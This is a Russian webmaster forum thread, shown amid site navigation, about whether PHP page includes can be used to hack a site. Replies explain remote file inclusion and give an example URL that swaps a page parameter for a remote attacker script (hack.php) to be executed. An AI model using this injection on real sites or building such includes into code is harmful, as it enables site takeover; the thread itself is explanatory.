- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Или допустим получить доступ к чему-либо?
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе.
называет это, если не ошибаюсь, кроссайт
Denis15, давай пример кода. ))
Помню была легендарная статья PHP. Действительно легкая смена дизайна. Не менее легендарная, чем про ЧПУ, но в отличие от ЧПУ очень вредная.
В ответ была написана статейка Простые шаблоны - опасность хака.
Хотелось бы узнать - можно ли через сабж как-либо взломать или повредить сайт? Или допустим получить доступ к чему-либо?
через дыры в скриптах:
вот живой пример дырявого скрипта:
взломщик через GET может вставить url своего скрипта.
взломщик через GET может вставить url своего скрипта.
Вместо www.site.ru/?page=main
Поставить www.site.ru/?page=http://site.narod.ru/hack.php
Где hack.php начнёт выполняться. А что в нём - это зависит от фантазии хакера.